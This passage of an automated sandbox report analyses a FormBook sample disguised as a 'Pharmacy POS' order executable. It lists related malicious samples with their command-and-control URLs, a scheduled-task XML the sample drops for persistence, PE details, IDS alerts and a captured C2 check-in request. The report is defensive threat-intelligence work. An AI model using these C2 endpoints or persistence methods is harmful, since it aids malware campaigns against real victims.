                                    DNPr7t0GMY.exeGet hashmaliciousBrowse
                                    • www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6
                                    5SXTKXCnqS.exeGet hashmaliciousBrowse
                                    • www.centerstageacademyaz.com/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr
                                    AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                    • www.centerstageacademyaz.com/hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U
                                    #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                    • www.mnanoramaonline.com/dp3a/?6l6x=JpPDbdpPqJah&F4ClVX_=HMSedmBm6/hIWbSmMxUxYZbRrtDTwFsk+TyYRjGVNzdErelZVoFwy82MvW0W4Pxo5ExE
                                    Payment receipt MT103.exeGet hashmaliciousBrowse
                                    • www.2006almadenrd.com/n86i/?3fDpH=EncZcG68c0UFvrfaep8p5kHr59rKeBqDHDmJoTlHDlH5Q19q6THcE1BV1jQP2/4tmveZ&Vjo=1bT0vz7
                                    New Order.exeGet hashmaliciousBrowse
                                    • www.flockuplabs.com/uqf5/?mVS=CH5D6h5PGn4ts&3fCDL=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/ArNV1zcwD6YY
                                    NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                    • www.cohorsetrails.com/j7e/?iP_T-V=s4TxBF2&F8EdvhY=0uFKBmvmOY3N1cR6tfDjvpZ4XCwo5tCp3URJWx4vIEcYZHH/ZYklCf5hgzXfIPGP0WLm
                                    oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                    • www.covid-19-411.com/c6ss/?P6AT72s=DB71Bym9Rr14TfwtieeaSq+XP6MPPP3k6OJ3eYsEhcCNhSwkByfhm8SfoYhSpsTVm4Za&j6A4qv=gJBt3
                                    qXDtb88hht.exeGet hashmaliciousBrowse
                                    • www.thriveglucose.com/p2io/?Z8E=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6&b0GDi6=Q6Ahtfox
                                    a8eC6O6okf.exeGet hashmaliciousBrowse
                                    • www.oceancollaborative.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOeXG6ZsHsCfG
                                    Telex_Payment.exeGet hashmaliciousBrowse
                                    • www.avaatraelegant.com/m3rc/?hTk8tpm=TSQTGbGl+UafldaDY7iOrPnVdHYt9Ypfw/QiU1mtcNJ1KwINQbFG4EVzsaDm0ZQusGTd&I4=5jxX5BaX4hy8-j8
                                    QyKNw7NioL.exeGet hashmaliciousBrowse
                                    • www.thriveglucose.com/p2io/?m4=PditjTvx4PwX_x-&aBd=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YuKFK/aPa09
                                    Payment_Advice.exeGet hashmaliciousBrowse
                                    • www.ingenious.care/uqf5/?9rw=IyvMBxqM8mznciPJtkomKlfF/kq/6zAZ/NulsdYJ5cntVs/S9fIvdvtMsAQ76USE273s&s6=bPYXfd3Xq0VHDp
                                    SOA #093732.exeGet hashmaliciousBrowse
                                    • www.xn--arepasantabrbara-pmb.com/hme1/?jPw=2SPw7LQlaa7cti3Mn2rz6TCjd7lU8jHnPITUh2R4n2dBA+x2SVgAgss/958kYo9ATjis&y2JhS=6lr41hZpgNXtF
                                    rHk5KU7bfT.exeGet hashmaliciousBrowse
                                    • www.rvvikings.com/dxe/?TfTl=jHjQ1sEHwNXw4n+A/8fpKnaO6SpchAkuZ+GgFHi7AN8kb2XA0i8OmoFepGcQzHHYqc9c&7nGt5=h6Altfix
                                    Order.exeGet hashmaliciousBrowse
                                    • www.complexscale.net/jogt/?w6ATB0=mM0Ck4zU/d9hG5lVEWeH7uQPwyvlCbjgstqvdurAh1ZdTH4Yqc2sgGmD0X7Q/SemRdxv&Jxox=Er6tXhMxl
                                    VubYcOdGjQ.exeGet hashmaliciousBrowse
                                    • www.theguyscave.com/k8n/?wR-T-=ETYdeRC&5jn=ffRSpgj0URUgPhDkzfA3YdlDQQz5pJJRybkyQxcySljT84fGDbAnWSnhJv/zp2N19SZb
                                    Payment_Advice.exeGet hashmaliciousBrowse
                                    • www.getthistle.com/q4kr/?w2MLb=6lux&QtRl=Jt1JO2t971959LrdDM/EJ1cvA97Pwm/HDqPg7v3P69I8XU+CUZlUHoU2RjaRLLQwrinB
                                    Neworder.exeGet hashmaliciousBrowse
                                    • www.kanitanaillounge.com/jogt/?PlQ8j=jKXq1ZQHcPBM/dFmsG96Rrq7SiC5kuIPSSiD8Dd2ip+Nb1yUpyUL4OnIzbOoJzgaBXqf&2db=g0G0iLxxPHIT

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    AS-26496-GO-DADDY-COM-LLCUS8BDBD0yy0q.apkGet hashmaliciousBrowse
                                    • 166.62.28.102
                                    8BDBD0yy0q.apkGet hashmaliciousBrowse
                                    • 166.62.28.102
                                    KY4cmAI0jU.exeGet hashmaliciousBrowse
                                    • 107.180.57.111
                                    5t2CmTUhKc.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    DNPr7t0GMY.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    SKlGhwkzTi.exeGet hashmaliciousBrowse
                                    • 192.169.223.13
                                    5SXTKXCnqS.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    619wGDCTZA.exeGet hashmaliciousBrowse
                                    • 23.229.215.137
                                    Documents_13134976_1377491379.xlsbGet hashmaliciousBrowse
                                    • 107.180.50.232
                                    #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    Payment receipt MT103.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    research-531942606.xlsbGet hashmaliciousBrowse
                                    • 72.167.211.83
                                    research-121105165.xlsbGet hashmaliciousBrowse
                                    • 72.167.211.83
                                    research-76934760.xlsbGet hashmaliciousBrowse
                                    • 72.167.211.83
                                    research-1960540844.xlsxGet hashmaliciousBrowse
                                    • 72.167.211.83
                                    research-1110827633.xlsbGet hashmaliciousBrowse
                                    • 72.167.211.83
                                    DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                    • 148.66.138.158
                                    New Order.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    DocumentScanCopy202_pdf.exeGet hashmaliciousBrowse
                                    • 148.66.138.158

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 275594 04-D4E5A.exe.log
                                    Process:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:ML9E4Ks29E4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:B666A4404B132B2BF6C04FBF848EB948
                                    SHA1:D2EFB3D43F8B8806544D3A47F7DAEE8534981739
                                    SHA-256:7870616D981C8C0DE9A54E7383CD035470DB20CBF75ACDF729C32889D4B6ED96
                                    SHA-512:00E955EE9F14CEAE07E571A8EF2E103200CF421BAE83A66ED9F9E1AA6A9F449B653EDF1BFDB662A364D58ECF9B5FE4BB69D590DB2653F2F46A09F4D47719A862
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                    C:\Users\user\AppData\Local\Temp\tmp285B.tmp
                                    Process:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1643
                                    Entropy (8bit):5.188830651763348
                                    Encrypted:false
                                    SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBAtn:cbh47TlNQ//rydbz9I3YODOLNdq3Y
                                    MD5:56D17E4A40FC6692A30DDC6AB12DEA7A
                                    SHA1:FFDD7B9D79A37F71C7AD8DDFEA48CC2C48981951
                                    SHA-256:6BDE14E7796411E51AEF9BBAABAA4BFDCD1682BB8024B85F82174BC036967A9E
                                    SHA-512:63AE291BC4CA864EE06F0A1FF086683AD39F86FDE937CE37F12DFF0DE9623DF2CC0228EB8A0F772E26601AA1A1971DA53F05810AEC7350E47300907C53865550
                                    Malicious:true
                                    Reputation:low
                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                    C:\Users\user\AppData\Roaming\EDclkRlYpO.exe
                                    Process:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):954880
                                    Entropy (8bit):7.108829775586779
                                    Encrypted:false
                                    SSDEEP:12288:yhS4xbbDSZqDULqJeVC/59xQ0tmvkZjsn+o2JUHVe6zDXhscccku2sX8EFObPpan:yhPx7JeMhY0t/i2JUHVe6zbO/u2a
                                    MD5:3F4CC7F69F0D3B70A20DFD2243BC16DB
                                    SHA1:B0E2841F5C7D754E4AF796088B659C204EDF5FD8
                                    SHA-256:6E556200DBA57FDCE36308BBD34C19398ECF627828627B380244AEEDE2F90176
                                    SHA-512:ACF43373CAB61D80264A27B961C0E2FB0753458A73F9A6CF651C27089F81178E85A91B9309503295C6CCD94C2395C1EEEEBB629C95B25F719556480D8395A58A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Metadefender, Detection: 29%, Browse
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Reputation:low
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!l.`..............0..|..........n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...tz... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B................P.......H...................r...x....9...........................................0..........(....(....*..0..).......r...p..r...p(....(....:.... .. ....a%..^E........+...............i.......Y...8....(..... {.*.+.r...p(..... Z!2yZ .=c.a+..r...p(....(....,. ....%+. i.,&%&. V@.YZa8x....(.... ....8h....(....(....rC..p(....-. ....%+. [{..%&. .t-Za85....,. ....%+. .5Ac%&. X1..Za8...........s....(....%.(.....(....*....0...............(0...*..0...........u......:.... 27.8 j..ua%...^E......

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.108829775586779
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:Order 275594 04-D4E5A.exe
                                    File size:954880
                                    MD5:3f4cc7f69f0d3b70a20dfd2243bc16db
                                    SHA1:b0e2841f5c7d754e4af796088b659c204edf5fd8
                                    SHA256:6e556200dba57fdce36308bbd34c19398ecf627828627b380244aeede2f90176
                                    SHA512:acf43373cab61d80264a27b961c0e2fb0753458a73f9a6cf651c27089f81178e85a91b9309503295c6ccd94c2395c1eeeebb629c95b25f719556480d8395a58a
                                    SSDEEP:12288:yhS4xbbDSZqDULqJeVC/59xQ0tmvkZjsn+o2JUHVe6zDXhscccku2sX8EFObPpan:yhPx7JeMhY0t/i2JUHVe6zbO/u2a
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!l.`..............0..|..........n.... ........@.. ....................................@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x4e9a6e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x60C16C21 [Thu Jun 10 01:34:25 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe9a180x53.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x10f8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xe7a740xe7c00False0.670548686961data7.11280635701IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0xea0000x10f80x1200False0.376953125data4.90679046803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xec0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0xea0a00x32cdata
                                    RT_MANIFEST0xea3cc0xd25XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright 2017 - 2021
                                    Assembly Version1.0.0.0
                                    InternalNameEhBr.exe
                                    FileVersion1.0.0.0
                                    CompanyName
                                    LegalTrademarks
                                    Comments
                                    ProductNamePharmacy POS
                                    ProductVersion1.0.0.0
                                    FileDescriptionPharmacy POS
                                    OriginalFilenameEhBr.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    06/11/21-13:30:58.385090TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.3184.168.131.241
                                    06/11/21-13:30:58.385090TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.3184.168.131.241
                                    06/11/21-13:30:58.385090TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.3184.168.131.241

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jun 11, 2021 13:30:58.187603951 CEST4975080192.168.2.3184.168.131.241
                                    Jun 11, 2021 13:30:58.384639978 CEST8049750184.168.131.241192.168.2.3
                                    Jun 11, 2021 13:30:58.384824991 CEST4975080192.168.2.3184.168.131.241
                                    Jun 11, 2021 13:30:58.385090113 CEST4975080192.168.2.3184.168.131.241
                                    Jun 11, 2021 13:30:58.582222939 CEST8049750184.168.131.241192.168.2.3
                                    Jun 11, 2021 13:30:58.625556946 CEST8049750184.168.131.241192.168.2.3
                                    Jun 11, 2021 13:30:58.625574112 CEST8049750184.168.131.241192.168.2.3
                                    Jun 11, 2021 13:30:58.625904083 CEST4975080192.168.2.3184.168.131.241
                                    Jun 11, 2021 13:30:58.626024008 CEST4975080192.168.2.3184.168.131.241
                                    Jun 11, 2021 13:30:58.822619915 CEST8049750184.168.131.241192.168.2.3

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jun 11, 2021 13:28:56.035695076 CEST5598453192.168.2.38.8.8.8
                                    Jun 11, 2021 13:28:56.095758915 CEST53559848.8.8.8192.168.2.3
                                    Jun 11, 2021 13:28:57.218502045 CEST6418553192.168.2.38.8.8.8
                                    Jun 11, 2021 13:28:57.276787996 CEST53641858.8.8.8192.168.2.3
                                    Jun 11, 2021 13:28:58.352117062 CEST6511053192.168.2.38.8.8.8
                                    Jun 11, 2021 13:28:58.405090094 CEST53651108.8.8.8192.168.2.3
                                    Jun 11, 2021 13:28:59.956739902 CEST5836153192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:00.006784916 CEST53583618.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:01.301841021 CEST6349253192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:01.355181932 CEST53634928.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:02.467735052 CEST6083153192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:02.520863056 CEST53608318.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:03.746089935 CEST6010053192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:03.799196005 CEST53601008.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:05.077223063 CEST5319553192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:05.127296925 CEST53531958.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:06.261547089 CEST5014153192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:06.320343018 CEST53501418.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:07.418147087 CEST5302353192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:07.468631029 CEST53530238.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:08.736501932 CEST4956353192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:08.787036896 CEST53495638.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:09.916827917 CEST5135253192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:09.967027903 CEST53513528.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:11.139826059 CEST5934953192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:11.191253901 CEST53593498.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:13.430577040 CEST5708453192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:13.491444111 CEST53570848.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:14.705519915 CEST5882353192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:14.755597115 CEST53588238.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:15.857925892 CEST5756853192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:15.909945011 CEST53575688.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:17.067784071 CEST5054053192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:17.120728970 CEST53505408.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:29.430068016 CEST5436653192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:29.489078999 CEST53543668.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:34.103050947 CEST5303453192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:34.179440975 CEST53530348.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:51.063842058 CEST5776253192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:51.115833044 CEST53577628.8.8.8192.168.2.3
                                    Jun 11, 2021 13:29:51.239130974 CEST5543553192.168.2.38.8.8.8
                                    Jun 11, 2021 13:29:51.290855885 CEST53554358.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:00.382364988 CEST5071353192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:00.518738985 CEST53507138.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:01.132590055 CEST5613253192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:01.274699926 CEST53561328.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:02.169997931 CEST5898753192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:02.231293917 CEST53589878.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:02.754183054 CEST5657953192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:02.794564009 CEST6063353192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:02.813086033 CEST53565798.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:02.863462925 CEST53606338.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:03.839998007 CEST6129253192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:03.898885965 CEST53612928.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:04.475573063 CEST6361953192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:04.537290096 CEST53636198.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:05.044316053 CEST6493853192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:05.104093075 CEST53649388.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:06.692922115 CEST6194653192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:06.751569986 CEST53619468.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:09.141072989 CEST6491053192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:09.202841997 CEST53649108.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:09.665821075 CEST5212353192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:09.727432013 CEST53521238.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:14.604495049 CEST5613053192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:14.665136099 CEST53561308.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:47.502353907 CEST5633853192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:47.573756933 CEST53563388.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:49.182831049 CEST5942053192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:49.242930889 CEST53594208.8.8.8192.168.2.3
                                    Jun 11, 2021 13:30:58.111545086 CEST5878453192.168.2.38.8.8.8
                                    Jun 11, 2021 13:30:58.175209999 CEST53587848.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jun 11, 2021 13:30:58.111545086 CEST192.168.2.38.8.8.80x8be3Standard query (0)www.filmarabia.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jun 11, 2021 13:30:58.175209999 CEST8.8.8.8192.168.2.30x8be3No error (0)www.filmarabia.comfilmarabia.comCNAME (Canonical name)IN (0x0001)
                                    Jun 11, 2021 13:30:58.175209999 CEST8.8.8.8192.168.2.30x8be3No error (0)filmarabia.com184.168.131.241A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.filmarabia.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.349750184.168.131.24180C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 11, 2021 13:30:58.385090113 CEST5174OUTGET /dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE HTTP/1.1
                                    Host: www.filmarabia.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
